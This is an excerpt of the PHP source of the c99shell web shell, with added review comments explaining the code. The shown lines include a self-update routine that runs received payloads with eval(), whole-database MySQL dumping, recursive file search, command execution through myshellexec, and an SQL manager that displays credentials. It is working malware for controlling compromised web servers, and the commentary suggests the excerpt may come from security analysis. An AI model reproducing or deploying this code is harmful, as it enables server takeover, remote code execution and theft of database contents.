  547.      $fp = fopen(__FILE__,"w");
  548.      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  549.      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
  550.     }
  551.    }
  552.    else {return "New version are available: ".$string[1];}
  553.   }
  // Type 0x04: the payload is executed as PHP with eval().
  554.   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  555.   else {return "Error in protocol: segmentation failed! (".$data.") ";}
  556.  }
  557. }
  558. }
  559. if (!function_exists("mysql_dump"))
  560. {
  561. function mysql_dump($set)
  562. {
  563.  global $shver;
  564.  $sock = $set["sock"];
  565.  $db = $set["db"];
  566.  $print = $set["print"];
  567.  $nl2br = $set["nl2br"];
  568.  $file = $set["file"];
  569.  $add_drop = $set["add_drop"];
  570.  $tabs = $set["tabs"];
  571.  $onlytabs = $set["onlytabs"];
  572.  $ret = array();
  573.  $ret["err"] = array();
  574.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  575.  if (empty($db)) {$db = "db";}
  576.  if (empty($print)) {$print = 0;}
  577.  if (empty($nl2br)) {$nl2br = 0;}
  578.  if (empty($add_drop)) {$add_drop = true;}
  579.  if (empty($file))
  580.  {
  581.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  582.  }
  583.  if (!is_array($tabs)) {$tabs = array();}
  584.  if (empty($add_drop)) {$add_drop = true;}
  585.  if (sizeof($tabs) == 0)
  586.  {
  587.   // retrive tables-list
  588.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  589.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  590.  }
  591.  $out = "# Dumped by C99Shell.SQL v. ".$shver."
  592. # Home page: http://ccteam.ru
  593. #
  594. # Host settings:
  595. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  596. # Date: ".date("d.m.Y H:i:s")."
  597. # DB: \"".$db."\"
  598. #---------------------------------------------------------
  599. ";
  600.  $c = count($onlytabs);
  601.  foreach($tabs as $tab)
  602.  {
  603.   if ((in_array($tab,$onlytabs)) or (!$c))
  604.   {
  605.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  606.    // recieve query for create table structure
  607.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  608.    if (!$res) {$ret["err"][] = mysql_smarterror();}
  609.    else
  610.    {
  611.     $row = mysql_fetch_row($res);
  612.     $out .= $row["1"].";\n\n";
  613.     // recieve table variables
  614.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  615.     if (mysql_num_rows($res) > 0)
  616.     {
  617.      while ($row = mysql_fetch_assoc($res))
  618.      {
  619.       $keys = implode("`, `", array_keys($row));
  620.       $values = array_values($row);
  621.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  622.       $values = implode("', '", $values);
  623.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  624.       $out .= $sql;
  625.      }
  626.     }
  627.    }
  628.   }
  629.  }
  630.  $out .= "#---------------------------------------------------------------------------------\n\n";
  631.  if ($file)
  632.  {
  633.   $fp = fopen($file, "w");
  634.   if (!$fp) {$ret["err"][] = 2;}
  635.   else
  636.   {
  637.    fwrite ($fp, $out);
  638.    fclose ($fp);
  639.   }
  640.  }
  641.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  642.  return $out;
  643. }
  644. }
  645. if (!function_exists("mysql_buildwhere"))
  646. {
  647. function mysql_buildwhere($array,$sep=" and",$functs=array())
  648. {
  649.  if (!is_array($array)) {$array = array();}
  650.  $result = "";
  651.  foreach($array as $k=>$v)
  652.  {
  653.   $value = "";
  654.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  655.   $value .= "'".addslashes($v)."'";
  656.   if (!empty($functs[$k])) {$value .= ")";}
  657.   $result .= "`".$k."` = ".$value.$sep;
  658.  }
  659.  $result = substr($result,0,strlen($result)-strlen($sep));
  660.  return $result;
  661. }
  662. }
  663. if (!function_exists("mysql_fetch_all"))
  664. {
  665. function mysql_fetch_all($query,$sock)
  666. {
  667.  if ($sock) {$result = mysql_query($query,$sock);}
  668.  else {$result = mysql_query($query);}
  669.  $array = array();
  670.  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  671.  mysql_free_result($result);
  672.  return $array;
  673. }
  674. }
  675. if (!function_exists("mysql_smarterror"))
  676. {
  677. function mysql_smarterror($type,$sock)
  678. {
  679.  if ($sock) {$error = mysql_error($sock);}
  680.  else {$error = mysql_error();}
  681.  $error = htmlspecialchars($error);
  682.  return $error;
  683. }
  684. }
  685. if (!function_exists("mysql_query_form"))
  686. {
  687. function mysql_query_form()
  688. {
  689.  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  690.  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  691.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  692.  if ((!$submit) or ($sql_act))
  693.  {
  694.   echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  695.   if ($tbl_struct)
  696.   {
  697.    echo "<td valign=\"top\"><b>Fields:</b><br>";
  698.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  699.    echo "</td></tr></table>";
  700.   }
  701.  }
  702.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  703. }
  704. }
  705. if (!function_exists("mysql_create_db"))
  706. {
  707. function mysql_create_db($db,$sock="")
  708. {
  709.  $sql = "CREATE DATABASE `".addslashes($db)."`;";
  710.  if ($sock) {return mysql_query($sql,$sock);}
  711.  else {return mysql_query($sql);}
  712. }
  713. }
  // Defined only when no function of this name exists yet.
  // Classifies a SQL string by its first word. The statement is split on single
  // spaces and the first token, upper-cased, is looked up in $types.
  // Returns false when the verb is not one of SELECT / SHOW / DELETE / DROP.
  // NOTE(review): the recognised-verb path fills $result but has no return
  // statement in the visible body, so callers would receive null there.
  714. if (!function_exists("mysql_query_parse"))
  715. {
  716. function mysql_query_parse($query)
  717. {
  718.  $query = trim($query);
  719.  $arr = explode (" ",$query);
  720.  /*array array()
  721.  {
  722.   "METHOD"=>array(output_type),
  723.   "METHOD1"...
  724.   ...
  725.  }
  726.  if output_type == 0, no output,
  727.  if output_type == 1, no output if no error
  728.  if output_type == 2, output without control-buttons
  729.  if output_type == 3, output with control-buttons
  730.  */
  731.  $types = array(
  732.   "SELECT"=>array(3,1),
  733.   "SHOW"=>array(2,1),
  734.   "DELETE"=>array(1),
  735.   "DROP"=>array(1)
  736.  );
  737.  $result = array();
  738.  $op = strtoupper($arr[0]);
  739.  if (is_array($types[$op]))
  740.  {
  // "propertions" is the key the original author chose; it is a runtime string.
  741.   $result["propertions"] = $types[$op];
  742.   $result["query"]  = $query;
  // NOTE(review): $types[$op] is an array here, compared loosely with the
  // integer 2 - this does not look like it can hold, so the LIMIT parsing
  // below appears to be unreachable. Confirm before relying on "limit".
  743.   if ($types[$op] == 2)
  744.   {
  745.    foreach($arr as $k=>$v)
  746.    {
  747.     if (strtoupper($v) == "LIMIT")
  748.     {
  // Token after LIMIT is split on "," ; a single number N becomes array(0, N).
  749.      $result["limit"] = $arr[$k+1];
  750.      $result["limit"] = explode(",",$result["limit"]);
  751.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  // Drops the LIMIT keyword and its argument from the token list only;
  // $result["query"] was already stored above and is not rebuilt.
  752.      unset($arr[$k],$arr[$k+1]);
  753.     }
  754.    }
  755.   }
  756.  }
  757.  else {return false;}
  758. }
  759. }
  // Defined only when no function of this name exists yet.
  // Recursive directory search. Walks $d, compares each entry name with the
  // criteria in the global array $a, optionally reads file contents to match
  // text, and appends every hit to the global list $found.
  // Counters: $search_i_d / $search_i_f count directories / files visited,
  // $found_d / $found_f count directories / files matched.
  // Returns nothing; all results go through the globals declared below.
  760. if (!function_exists("c99fsearch"))
  761. {
  762. function c99fsearch($d)
  763. {
  764.  global $found;
  765.  global $found_d;
  766.  global $found_f;
  767.  global $search_i_f;
  768.  global $search_i_d;
  769.  global $a;
  // Make sure the directory path ends with a separator before names are appended.
  770.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  // NOTE(review): the opendir() result is not checked before readdir() is called.
  771.  $h = opendir($d);
  772.  while (($f = readdir($h)) !== false)
  773.  {
  774.   if($f != "." && $f != "..")
  775.   {
  // Name match: plain substring test unless $a["name_regexp"] is set, in which
  // case ereg() is used. ereg() was removed in PHP 7.
  776.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
  777.    if (is_dir($d.$f))
  778.    {
  779.     $search_i_d++;
  // A directory counts as a hit only when no text criterion is set.
  780.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  // Recurse into real directories only; symlinks are not followed.
  781.     if (!is_link($d.$f)) {c99fsearch($d.$f);}
  782.    }
  783.    else
  784.    {
  785.     $search_i_f++;
  786.     if ($bool)
  787.     {
  788.      if (!empty($a["text"]))
  789.      {
  // Whole file is read into memory; read errors are suppressed with @.
  790.       $r = @file_get_contents($d.$f);
  // NOTE(review): $a is global, so the padding / lower-casing below rewrites
  // $a["text"] itself and is applied again for every later matching file.
  791.       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  792.       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  793.       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  // A space is prepended and the search starts at offset 1, so a hit at the
  // very start of the file yields 1 rather than a falsy 0.
  794.       else {$bool = strpos(" ".$r,$a["text"],1);}
  // $a["text_not"] inverts the content match.
  795.       if ($a["text_not"]) {$bool = !$bool;}
  796.       if ($bool) {$found[] = $d.$f; $found_f++;}
  797.      }
  798.      else {$found[] = $d.$f; $found_f++;}
  799.     }
  800.    }
  801.   }
  802.  }
  803.  closedir($h);
  804. }
  805. }
  // "gofile" is rewritten into a directory listing ("ls") when $f is a directory,
  // otherwise into a file view ("f") with $f split into directory and base name.
  // The start of the file copies every request parameter into a global of the
  // same name, so $act and $f are caller-controlled here.
  806. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  807. //Sending headers
  // Re-emits the buffered page through the gzip output handler.
  // Runs only when headers are not yet sent, the global $gzipencode is truthy and
  // the global $ft is none of "img", "download", "notepad".
  // NOTE(review): no register_shutdown_function() call is visible in this part of
  // the file; within these lines the only caller is c99shexit().
  808. function onphpshutdown()
  809. {
  810.  global $gzipencode,$ft;
  811.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  812.  {
  // Copy the current buffer, open a new buffer with the gzip callback and write
  // the copy into it; errors from both calls are suppressed with @.
  813.   $v = @ob_get_contents();
  814.   @ob_start("ob_gzHandler");
  815.   echo $v;
  816.  }
  817. }
  // Terminates the request: runs onphpshutdown() first, then exits the script.
  818. function c99shexit()
  819. {
  820.  onphpshutdown();
  821.  exit;
  822. }
  // Response headers that mark the page as already expired and not cacheable.
  823. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  824. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  825. header("Cache-Control: no-store, no-cache, must-revalidate");
  826. header("Cache-Control: post-check=0, pre-check=0", false);
  827. header("Pragma: no-cache");
  // Work directory: falls back to PHP's upload_tmp_dir when $tmpdir is empty.
  828. if (empty($tmpdir))
  829. {
  830.  $tmpdir = ini_get("upload_tmp_dir");
  // NOTE(review): "/tmp/" is substituted when upload_tmp_dir IS a directory,
  // which looks inverted - confirm the intended condition.
  831.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  832. }
  // Canonicalise, normalise separators and force a trailing separator.
  833. $tmpdir = realpath($tmpdir);
  834. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  835. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  836. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  837. else {$tmpdir_logs = realpath($tmpdir_logs);}
  // Reads the host's safe_mode and open_basedir settings and prepares HTML labels
  // for them; the labels are the shell's own wording ("secure" / "not secure").
  838. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  839. {
  840.  $safemode = true;
  841.  $hsafemode = "<font color=red>ON (secure)</font>";
  842. }
  843. else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  844. $v = @ini_get("open_basedir");
  // The raw open_basedir value is placed into the label without HTML escaping.
  845. if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
  846. else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  // $sort is HTML-escaped, defaulted from $sort_default, and its second element
  // (index 1) is lower-cased.
  847. $sort = htmlspecialchars($sort);
  848. if (empty($sort)) {$sort = $sort_default;}
  849. $sort[1] = strtolower($sort[1]);
  // Server banner for display: the PHP version is appended when missing, then
  // turned into a link to the act=phpinfo page after the banner is HTML-escaped.
  850. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  851. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  852. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  // Syntax-highlighting colours; the trailing comments are the author's own notes.
  853. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  854. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  855. @ini_set("highlight.default",$highlight_default); //#0000BB
  856. @ini_set("highlight.html",$highlight_html); //#000000
  857. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  858. @ini_set("highlight.string",$highlight_string); //#DD0000
  859. if (!is_array($actbox)) {$actbox = array();}
  // The requested action is HTML-escaped once and kept in both $act and $dspact.
  860. $dspact = $act = htmlspecialchars($act);
  861. $disp_fullpath = $ls_arr = $notls = null;
  // URL-encoded copy of the current directory.
  862. $ud = urlencode($d);
  863. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  864. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  865. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  866. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  867. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  868. $d = str_replace("\\\\","\\",$d);
  869. $dispd = htmlspecialchars($d);
  870. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  871. $i = 0;
  872. foreach($pd as $b)
  873. {
  874.  $t = "";
  875.  $j = 0;
  876.  foreach ($e as $r)
  877.  {
  878.   $t.= $r.DIRECTORY_SEPARATOR;
  879.   if ($j == $i) {break;}
  880.   $j++;
  881.  }
  882.  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  883.  $i++;
  884. }
  885. echo "&nbsp;&nbsp;&nbsp;";
  886. if (is_writable($d))
  887. {
  888.  $wd = true;
  889.  $wdt = "<font color=green>[ ok ]</font>";
  890.  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  891. }
  892. else
  893. {
  894.  $wd = false;
  895.  $wdt = "<font color=red>[ Read-Only ]</font>";
  896.  echo "<b>".view_perms_color($d)."</b>";
  897. }
  // Prints free and total space for the current directory $d when
  // disk_free_space() is callable. Failed lookups (false) and negative values
  // are clamped to 0 before use.
  898. if (is_callable("disk_free_space"))
  899. {
  900.  $free = disk_free_space($d);
  901.  $total = disk_total_space($d);
  902.  if ($free === false) {$free = 0;}
  903.  if ($total === false) {$total = 0;}
  904.  if ($free < 0) {$free = 0;}
  905.  if ($total < 0) {$total = 0;}
  // $used is computed here but not read anywhere in the visible lines.
  906.  $used = $total-$free;
  // NOTE(review): after the clamping above $free can be 0, which makes
  // $total/$free a division by zero.
  907.  $free_percent = round(100/($total/$free),2);
  908.  echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  909. }
  910. echo "<br>";
  911. $letters = "";
  912. if ($win)
  913. {
  914.  $v = explode("\\",$d);
  915.  $v = $v[0];
  916.  foreach (range("a","z") as $letter)
  917.  {
  918.   $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  919.   if (!$bool) {$bool = is_dir($letter.":\\");}
  920.   if ($bool)
  921.   {
  922.    $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  923.    if ($letter.":" != $v) {$letters .= $letter;}
  924.    else {$letters .= "<font color=green>".$letter."</font>";}
  925.    $letters .= " ]</a> ";
  926.   }
  927.  }
  928.  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  929. }
  930. if (count($quicklaunch) > 0)
  931. {
  932.  foreach($quicklaunch as $item)
  933.  {
  934.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  935.   $item[1] = str_replace("%sort",$sort,$item[1]);
  936.   $v = realpath($d."..");
  937.   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  938.   $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  939.   echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  940.  }
  941. }
  942. echo "</p></td></tr></table><br>";
  943. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  944. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  945. if ($act == "") {$act = $dspact = "ls";}
  946. if ($act == "sql")
  947. {
  948.  $sql_surl = $surl."act=sql";
  949.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  950.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  951.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  952.  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  953.  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  954.  $sql_surl .= "&";
  955.  ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  956.  if ($sql_server)
  957.  {
  958.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  959.   $err = mysql_smarterror();
  960.   @mysql_select_db($sql_db,$sql_sock);
  961.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  962.  }
  963.  else {$sql_sock = false;}
  964.  echo "<b>SQL Manager:</b><br>";
  965.  if (!$sql_sock)
  966.  {
  967.   if (!$sql_server) {echo "NO CONNECTION";}
  968.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  969.  }
  970.  else
  971.  {
  972.   $sqlquicklaunch = array();
  973.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  974.   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  975.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  976.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  977.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  978.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  979.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  980.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  981.   echo "</center>";
  982.  }
  983.  echo "</td></tr><tr>";
  984.  if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  985.  else
  986.  {
  987.   //Start left panel
  988.   if (!empty($sql_db))
  989.   {
  990.    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  991.    $result = mysql_list_tables($sql_db);
  992.    if (!$result) {echo mysql_smarterror();}
  993.    else
  994.    {
  995.     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  996.     $c = 0;
  997.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  998.     if (!$c) {echo "No tables found in database.";}
  999.    }
  1000.   }
  1001.   else
  1002.   {
  1003.    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1004.    $result = mysql_list_dbs($sql_sock);
  1005.    if (!$result) {echo mysql_smarterror();}
  1006.    else
  1007.    {
  1008.     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1009.     $c = 0;
  1010.     $dbs = "";
  1011.     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1012.     echo "<option value=\"\">Databases (".$c.")</option>";
  1013.     echo $dbs;
  1014.    }
